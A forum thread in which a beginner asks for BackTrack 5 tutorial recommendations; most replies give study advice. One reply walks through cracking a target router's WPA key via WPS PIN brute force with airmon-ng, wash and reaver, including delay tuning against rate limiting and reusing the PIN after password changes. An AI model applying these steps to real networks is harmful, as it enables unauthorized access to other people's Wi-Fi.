N00b BackTrack 5 youtube channels recommendations?

Hello guys,

Just started playing with BackTrack 5 r3 and was wondering if anyone had recommendation for any youtube channels?

Iv just been using the search function and looking for "BackTrack 5 tutorials" and wading through, but this has two floors......

1: There are TONE of videos out there, and few with good narration.

2: Its hard to narrow a search when you don't even know the potential of BackTrack.

So, I was wondering if anyone's videos in particular helped you out, or channels worth subscribing too?

when i was learning a few things on backtrack i found naration to be idiotic, with heavily accented videos, so i found that when i looked at a video, i would look in the 'about' box underneath the video, if it was commented well, it would have text commands there, which i would then be able to use in backtrack to mess around with. hope that helps. 

also, focus on one topic within backtrack, aka, sql injection, and then read white papers/youtube vids related to that topic, learn how to use that program and dont get distracted, backtrack is brilliant in the amount of preconfigured scripts it has, but if your just starting out, thats its downfall.

have fun :)

if you want to learn how to actualy use backtrack, you cant look up tutorials.

here is an example. say for example you want to do a man in the middle attack. look up how it works (just for the example, ill tell you. its ARP poisining). so then look up how ARP works. if you dont understand why ip addresses need to be translated into mac addresses, look that up. look up subnetting. look up how mac addresses work. once you understand all that, figure out how ARP works. open up a command prompt and run the arp command to see how its working in windows...

then, once you know how the protocol works, then start messing arround in ethercap or better yet, try to write your own basic arp program.

skidhacker has some good bt5 vids

but most all routers nowadays have wpa psk2 as standard so forget video tutorials this will do it

1 open terminal

2 airmon-ng 

3 airmon-ng start wlan0 (assuming that wlano was the output from 1)

4 wash -i mon0 (assuming mon0 was the output from 2)

5 reaver -i mon0 -b(bssid of target from 4) -vv

6 if ap rate limiting detected add -d20 before -vv in 5

only commands needed for recent (last 3 or 4 year old) routers

takers between an hour and a day depending

when its done copy the pin aswell as the wps psk as if password is changed adding -p(pin here) before -b will crack the new one in seconds ;)

need any more help feel free to pm or ask here

popeye

Thanks popeye, is there any chance you could brake down those command for me a little more so I understand what they are actually doing?

Also still getting AP rate limiting detected after putting "reaver -i mon0 -b(target bssid) -d20 -vv"?

And dose the 'very verbose' command in the above do anything other then feed me more information into the terminal? (as I missed it out by mistake and it just up-dated the % complete/time/date rather then all the other info too?

 

ok pal, sorry fro late reply and diff account but have had difficulty logging in,

first a break down,

ok 1st command airmon-ng lists available wifi adaptors,

start wlan0starts the adaptor into promiscuous mode,

wash lists target network details,

reaver is the tool that brute forces the 8 digit wps set up and the -d & -vv options are delay and verbose+ output

i use vv as you get more info on where if anywhere uyo are getting stuck, as you seem to be getting ap rate liminting you need to keep increasing the delay untill you stop pricking the routers security

if you are booting a live disc i would stop that and use a usb stick of 4gb up that way every time you need to stop you save the work you have allready done

when you eventually do get the full run through keep the password and pin then if the password is changed you can add a -p pingoeshere to reaver and it will crack new pass in less than a minit

also when you get stuck with ap rate limiting you can cntrl c to stop cursor up for last command and go again- this is why it is valuable to save session data hence usb with save file, i use universal linux usb installer freeware and does pretty much everuy os

i hope this helps im no expert but i use bt5 for the same reason as you and ive done it a fair few times and those are the commands i use and ive not failed one yet, also if you use reaver -help or maybe--help you will get all possible options for that command, works with any command

haPPY CRACKING

Check out security tube if you're looking to learn some real info-sec stuff. There's a lot of good stuff on there, all for free (Except for the actual certifications.) I just finished the wifi security megaprimer and it was 52 videos on how to perform a penetration test (hack) a wireless network, all done with backtrack 5. Very in depth, very intuitive, very worth while.

I would recommend that get a good grip over networking and how stuffs work over internet like severs and clients and many such things then go get this book Back track 5 cook book to understand the basics how things work in command line . then google would do better ...then any thing else 

a person always needs a man for a friend

Use Kali, its made by the same people but is up-to-date (the last time I checked) as it had a major re-do of the package system so it could easily update.

All the tutorials are the same and all the same packages are still available. Just a heads up is all.